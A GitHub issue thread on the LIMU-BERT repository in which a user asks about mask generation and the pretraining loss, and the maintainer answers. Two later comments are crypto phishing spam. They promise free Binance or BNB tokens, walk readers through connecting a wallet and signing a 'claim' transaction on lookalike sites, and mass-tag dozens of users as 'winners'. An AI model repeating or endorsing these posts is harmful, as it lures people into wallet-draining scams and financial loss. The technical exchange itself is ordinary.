### ISSUE TITLE
func_loss issue

### ISSUE THREAD

**Issue by tonyyunyang** [dapowan/LIMU-BERT-Public#11]
Hi,

I have two doubts regarding the code.

1. Is the mask for the original sequence static during pre-train?
E.g.: I have a sequence of length 10, [1, 2, 3, 4, 5, 6, 7, 8, 9, 0],
A mask [0, 1, 1, 1, 0, 0, 0, 0, 0, 0] is generated using the algorithm you have provided, will the mask vary during the training? Probably for the purpose of enabling the model to learn more information?

2. The loss function defined in pretrain.py does not seem to only consider the difference between masked elements in the sequence, it seems to consider the loss as the difference between the predicted sequence and the original sequence. Which I find contradicting to what had been written in the paper.

 ```
    def func_loss(model, batch):
        mask_seqs, masked_pos, seqs = batch #

        seq_recon = model(mask_seqs, masked_pos) #
        loss_lm = criterion(seq_recon, seqs) # for masked LM
        return loss_lm
```

**Comment by dapowan** [comment]
Hi, thanks for your interest. Sorry for the late responses:

1. Yes, it varies during the training.  We set the random seed in utils.py line 444 'set_seeds(train_cfg.seed)' to maintain reproducibility.  Every time when you run the script and call the mask function for the first time, it would give the same results. But different masked results can be obtained for the following callings.

2. You can check the details from model.py line 158 LIMUBertModel4Pretrain model. It only outputs the masked sequence specifying by the masked_pos.

For the above two questions, I highly recommend you debug our codes to check how they work in detail if you want to fully grasp it.

**Comment by tonyyunyang** [comment]
Hi,

Thank you very much for the reply! I find it very useful! However, another doubt has been raised.

Considering the issue of the masking method, I have another doubt which is related to `class Preprocess4Mask,` line 276 in the utils.py file.

I have figured that the number of masked positions (more precisely, the number of positions that are set to 0 in instance_mask) is different from the number of entries of seq (more precisely, this is the ground truth of positions to be predicted).

This is not a big issue, but it would cause a slight problem when calculating the loss.

Let me give you an example:
In instance_mask, there are 814 positions being set to 0, which means that there are 814 positions' values that requires to be predicted.
However, seq has 1012 entries, saying that 1012 positions are picked out for prediction and for calculating the loss.
This leads to the issue: 1012 - 814 = 198 positions are not masked, but still picked for calculating loss.

I do not know if this is done on purpose or not.

As for the masking configuration, I use exactly the same configuration in the JSON file, also shown below
```
  "limu_mask": {
    "mask_ratio": 0.15,
    "mask_alpha": 6,
    "max_gram": 10,
    "mask_prob": 0.8,
    "replace_prob": 0.0
  },
```

I did find the cause of this issue which is `if np.random.rand() < self.mask_prob:`
By removing this line, not considering the mask_prob, this issue is solved.

It would wonderful if you could explain to me a bit, why is mask_prob needed, and also whether you have done this on purpose.

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=Github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=Github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by highpolar-shubham** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @riko-sama, @q23818, @LeoThern, @Ery4z, @diwata2021, @khoilr, @ilyassayunus, @issmall, @mtsraposo, @forrestng88, @Mainstayz, @SickProdigy, @bx2, @nester50, @fly51fly, @Pravda-dev, @fjz15056311771, @stevenguo001, @jegooCN, @pingshian0131, @tangtom510, @bboyzurdo, @DylanSiegel, @yudian-dianfei, @miaosp, @z7-btc, @kirinchen, @Mjzs12138, @ZhangKurt, @iloveopenworld, @Hylouis233, @RogerProSelf, @ckdk9530, @hyanx, @ben46, @zeratul-r, @ethanforvest, @shikharsg, @SaigaGentil, @FernandoFH, @mohakmittal, @anyokayuiyo, @naztar0, @arklyg, @dzxindex, @d87J, @Joshualy94, @wang-626, @ldmax, @Valaia

**Comment by zeratul-r** [comment]
你好！      感谢你的来信，我会在查阅后尽快回复你。（自动回复）
